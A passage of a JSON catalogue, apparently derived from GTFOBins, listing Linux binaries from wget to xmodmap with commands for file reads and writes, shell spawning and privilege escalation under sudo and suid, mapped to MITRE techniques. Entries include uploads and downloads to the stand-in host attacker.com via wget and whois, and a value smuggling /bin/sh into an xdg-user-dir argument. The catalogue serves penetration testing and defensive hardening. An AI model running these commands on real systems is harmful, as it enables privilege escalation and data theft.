/path/to/output-file","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/wget/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wget:download:0:unprivileged","toolId":"gtfo:wget","toolName":"wget","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"wget http://attacker.com/path/to/input-file -O /path/to/output-file","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/wget/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wget:file-read:0:sudo","toolId":"gtfo:wget","toolName":"wget","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"wget -i /path/to/input-file","description":"The file to be read is treated as a list of URLs, one per line, which are actually fetched by `wget`. The content appears, somewhat modified, as error messages.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/wget/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wget:file-read:0:suid","toolId":"gtfo:wget","toolName":"wget","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"wget -i /path/to/input-file","description":"The file to be read is treated as a list of URLs, one per line, which are actually fetched by `wget`. The content appears, somewhat modified, as error messages.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/wget/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wget:file-read:0:unprivileged","toolId":"gtfo:wget","toolName":"wget","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"wget -i /path/to/input-file","description":"The file to be read is treated as a list of URLs, one per line, which are actually fetched by `wget`. The content appears, somewhat modified, as error messages.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/wget/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wget:file-write:0:sudo","toolId":"gtfo:wget","toolName":"wget","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"wget -i /path/to/input-file -o /path/to/output-file","description":"The file to be read is treated as a list of URLs, one per line, which are actually fetched by `wget`. The content appears, somewhat modified, as error messages.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/wget/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wget:file-write:0:suid","toolId":"gtfo:wget","toolName":"wget","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"wget -i /path/to/input-file -o /path/to/output-file","description":"The file to be read is treated as a list of URLs, one per line, which are actually fetched by `wget`. The content appears, somewhat modified, as error messages.","mitre":["T1565"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/wget/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wget:file-write:0:unprivileged","toolId":"gtfo:wget","toolName":"wget","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"wget -i /path/to/input-file -o /path/to/output-file","description":"The file to be read is treated as a list of URLs, one per line, which are actually fetched by `wget`. The content appears, somewhat modified, as error messages.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/wget/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wget:shell:0:sudo","toolId":"gtfo:wget","toolName":"wget","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo -e '#!/bin/sh\\n/bin/sh 1>&0' >/path/to/temp-file\nchmod +x /path/to/temp-file\nwget --use-askpass=/path/to/temp-file 0","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/wget/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wget:shell:0:suid","toolId":"gtfo:wget","toolName":"wget","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo -e '#!/bin/sh -p\\n/bin/sh -p 1>&0' >/path/to/temp-file\nchmod +x /path/to/temp-file\nwget --use-askpass=/path/to/temp-file 0","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/wget/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wget:shell:0:unprivileged","toolId":"gtfo:wget","toolName":"wget","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo -e '#!/bin/sh\\n/bin/sh 1>&0' >/path/to/temp-file\nchmod +x /path/to/temp-file\nwget --use-askpass=/path/to/temp-file 0","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/wget/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wget:upload:0:sudo","toolId":"gtfo:wget","toolName":"wget","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"wget --post-file=/path/to/input-file http://attacker.com","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/wget/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wget:upload:0:suid","toolId":"gtfo:wget","toolName":"wget","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"wget --post-file=/path/to/input-file http://attacker.com","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/wget/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wget:upload:0:unprivileged","toolId":"gtfo:wget","toolName":"wget","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"wget --post-file=/path/to/input-file http://attacker.com","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/wget/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wget:upload:1:sudo","toolId":"gtfo:wget","toolName":"wget","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"wget --post-data=DATA http://attacker.com","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/wget/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wget:upload:1:suid","toolId":"gtfo:wget","toolName":"wget","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"wget --post-data=DATA http://attacker.com","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/wget/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wget:upload:1:unprivileged","toolId":"gtfo:wget","toolName":"wget","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"wget --post-data=DATA http://attacker.com","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/wget/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:whiptail:file-read:0:sudo","toolId":"gtfo:whiptail","toolName":"whiptail","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"whiptail --textbox --scrolltext /path/to/input-file 0 0","description":"The file is shown in an interactive TUI dialog made for displaying text, arrows can be used to scroll long content.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/whiptail/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:whiptail:file-read:0:suid","toolId":"gtfo:whiptail","toolName":"whiptail","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"whiptail --textbox --scrolltext /path/to/input-file 0 0","description":"The file is shown in an interactive TUI dialog made for displaying text, arrows can be used to scroll long content.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/whiptail/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:whiptail:file-read:0:unprivileged","toolId":"gtfo:whiptail","toolName":"whiptail","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"whiptail --textbox --scrolltext /path/to/input-file 0 0","description":"The file is shown in an interactive TUI dialog made for displaying text, arrows can be used to scroll long content.","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/whiptail/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:whois:download:0:sudo","toolId":"gtfo:whois","toolName":"whois","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"whois -h attacker.com -p 12345 x","description":"Received data has instances of the `\\r` byte stripped.","mitre":["T1105"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/whois/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:whois:download:0:suid","toolId":"gtfo:whois","toolName":"whois","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download","Privilege Escalation"],"nativeCategory":["download"],"command":"whois -h attacker.com -p 12345 x","description":"Received data has instances of the `\\r` byte stripped.","mitre":["T1105"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/whois/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:whois:download:0:unprivileged","toolId":"gtfo:whois","toolName":"whois","name":"download","source":"GTFOBins","platform":["Linux"],"capability":["File Download"],"nativeCategory":["download"],"command":"whois -h attacker.com -p 12345 x","description":"Received data has instances of the `\\r` byte stripped.","mitre":["T1105"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/whois/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:whois:upload:0:sudo","toolId":"gtfo:whois","toolName":"whois","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"whois -h attacker.com -p 12345 DATA","description":"Data is converted to lower case, and has a trailing `\\r\\n`.","mitre":["T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/whois/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:whois:upload:0:suid","toolId":"gtfo:whois","toolName":"whois","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload","Privilege Escalation"],"nativeCategory":["upload"],"command":"whois -h attacker.com -p 12345 DATA","description":"Data is converted to lower case, and has a trailing `\\r\\n`.","mitre":["T1041"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/whois/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:whois:upload:0:unprivileged","toolId":"gtfo:whois","toolName":"whois","name":"upload","source":"GTFOBins","platform":["Linux"],"capability":["File Upload"],"nativeCategory":["upload"],"command":"whois -h attacker.com -p 12345 DATA","description":"Data is converted to lower case, and has a trailing `\\r\\n`.","mitre":["T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/whois/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wireshark:file-write:0:sudo","toolId":"gtfo:wireshark","toolName":"wireshark","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write","Privilege Escalation"],"nativeCategory":["file-write"],"command":"wireshark -c 1 -i lo -k -f 'udp port 12345' &\necho DATA | nc -u 127.127.127.127 12345","description":"This technique can be used to write arbitrary files, i.e., the dump of one UDP packet.\n\nAfter starting Wireshark, and waiting for the capture to begin, deliver the UDP packet, e.g., with `nc` (see below). The capture then stops and the packet dump can be saved:\n\n1. select the only received packet;\n\n2. right-click on \"Data\" from the \"Packet Details\" pane, and select \"Export Packet Bytes...\";\n\n3. choose where to save the packet dump.","mitre":["T1565"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/wireshark/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wireshark:file-write:0:unprivileged","toolId":"gtfo:wireshark","toolName":"wireshark","name":"file-write","source":"GTFOBins","platform":["Linux"],"capability":["File Write"],"nativeCategory":["file-write"],"command":"wireshark -c 1 -i lo -k -f 'udp port 12345' &\necho DATA | nc -u 127.127.127.127 12345","description":"This technique can be used to write arbitrary files, i.e., the dump of one UDP packet.\n\nAfter starting Wireshark, and waiting for the capture to begin, deliver the UDP packet, e.g., with `nc` (see below). The capture then stops and the packet dump can be saved:\n\n1. select the only received packet;\n\n2. right-click on \"Data\" from the \"Packet Details\" pane, and select \"Export Packet Bytes...\";\n\n3. choose where to save the packet dump.","mitre":["T1565"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/wireshark/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wireshark:inherit:0:sudo","toolId":"gtfo:wireshark","toolName":"wireshark","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload","Privilege Escalation"],"nativeCategory":["inherit","from:lua"],"command":"wireshark","description":"This requires GUI interaction. Start Wireshark, then from the main menu, select \"Tools\" -> \"Lua\" -> \"Evaluate\". A window opens that allows to execute Lua code.","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/wireshark/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wireshark:inherit:0:unprivileged","toolId":"gtfo:wireshark","toolName":"wireshark","name":"inherit ← lua","source":"GTFOBins","platform":["Linux"],"capability":["Reverse/Bind Shell","File Download","File Read","File Write","Execution","File Upload"],"nativeCategory":["inherit","from:lua"],"command":"wireshark","description":"This requires GUI interaction. Start Wireshark, then from the main menu, select \"Tools\" -> \"Lua\" -> \"Evaluate\". A window opens that allows to execute Lua code.","mitre":["T1059","T1071","T1105","T1005","T1565","T1041"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/wireshark/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wish:inherit:0:sudo","toolId":"gtfo:wish","toolName":"wish","name":"inherit ← tclsh","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Reverse/Bind Shell","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:tclsh"],"command":"wish","mitre":["T1574","T1059","T1071"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/wish/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wish:inherit:0:suid","toolId":"gtfo:wish","toolName":"wish","name":"inherit ← tclsh","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Reverse/Bind Shell","Execution","Privilege Escalation"],"nativeCategory":["inherit","from:tclsh"],"command":"wish","mitre":["T1574","T1059","T1071"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/wish/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:wish:inherit:0:unprivileged","toolId":"gtfo:wish","toolName":"wish","name":"inherit ← tclsh","source":"GTFOBins","platform":["Linux"],"capability":["Library Load","Reverse/Bind Shell","Execution"],"nativeCategory":["inherit","from:tclsh"],"command":"wish","mitre":["T1574","T1059","T1071"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/wish/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xargs:file-read:0:sudo","toolId":"gtfo:xargs","toolName":"xargs","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"xargs -a /path/to/input-file -0","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/xargs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xargs:file-read:0:suid","toolId":"gtfo:xargs","toolName":"xargs","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"xargs -a /path/to/input-file -0","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/xargs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xargs:file-read:0:unprivileged","toolId":"gtfo:xargs","toolName":"xargs","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read"],"nativeCategory":["file-read"],"command":"xargs -a /path/to/input-file -0","mitre":["T1005"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/xargs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xargs:shell:0:sudo","toolId":"gtfo:xargs","toolName":"xargs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"xargs -a /dev/null /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/xargs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xargs:shell:0:suid","toolId":"gtfo:xargs","toolName":"xargs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"xargs -a /dev/null /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/xargs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xargs:shell:0:unprivileged","toolId":"gtfo:xargs","toolName":"xargs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"xargs -a /dev/null /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/xargs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xargs:shell:1:sudo","toolId":"gtfo:xargs","toolName":"xargs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"xargs -a /dev/null /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/xargs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xargs:shell:1:suid","toolId":"gtfo:xargs","toolName":"xargs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"xargs -a /dev/null /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/xargs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xargs:shell:1:unprivileged","toolId":"gtfo:xargs","toolName":"xargs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"xargs -a /dev/null /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/xargs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xargs:shell:2:sudo","toolId":"gtfo:xargs","toolName":"xargs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo x | xargs -o -a /dev/null /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/xargs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xargs:shell:2:suid","toolId":"gtfo:xargs","toolName":"xargs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"echo x | xargs -o -a /dev/null /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/xargs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xargs:shell:2:unprivileged","toolId":"gtfo:xargs","toolName":"xargs","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"echo x | xargs -o -a /dev/null /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/xargs/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xdg-user-dir:shell:0:sudo","toolId":"gtfo:xdg-user-dir","toolName":"xdg-user-dir","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"xdg-user-dir '}; /bin/sh #'","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/xdg-user-dir/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xdg-user-dir:shell:0:unprivileged","toolId":"gtfo:xdg-user-dir","toolName":"xdg-user-dir","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"xdg-user-dir '}; /bin/sh #'","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/xdg-user-dir/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xdotool:shell:0:sudo","toolId":"gtfo:xdotool","toolName":"xdotool","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"xdotool exec --sync /bin/sh","mitre":["T1059"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/xdotool/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xdotool:shell:0:suid","toolId":"gtfo:xdotool","toolName":"xdotool","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution","Privilege Escalation"],"nativeCategory":["shell"],"command":"xdotool exec --sync /bin/sh -p","mitre":["T1059"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/xdotool/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xdotool:shell:0:unprivileged","toolId":"gtfo:xdotool","toolName":"xdotool","name":"shell","source":"GTFOBins","platform":["Linux"],"capability":["Execution"],"nativeCategory":["shell"],"command":"xdotool exec --sync /bin/sh","mitre":["T1059"],"privilege":"unprivileged","context":"unprivileged","references":["https://gtfobins.github.io/gtfobins/xdotool/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xmodmap:file-read:0:sudo","toolId":"gtfo:xmodmap","toolName":"xmodmap","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"xmodmap -v /path/to/input-file","description":"The read file content is corrupted by error prints.","mitre":["T1005"],"privilege":"sudo","context":"sudo","references":["https://gtfobins.github.io/gtfobins/xmodmap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check installation","aliases":[]},{"id":"gtfo:xmodmap:file-read:0:suid","toolId":"gtfo:xmodmap","toolName":"xmodmap","name":"file-read","source":"GTFOBins","platform":["Linux"],"capability":["File Read","Privilege Escalation"],"nativeCategory":["file-read"],"command":"xmodmap -v /path/to/input-file","description":"The read file content is corrupted by error prints.","mitre":["T1005"],"privilege":"suid","context":"suid","references":["https://gtfobins.github.io/gtfobins/xmodmap/"],"compatibility":"Linux reference. macOS compatibility has not been checked for this command and execution context.","requires":[],"services":[],"environment":["Local host"],"verification":"Upstream reference","availability":"Check 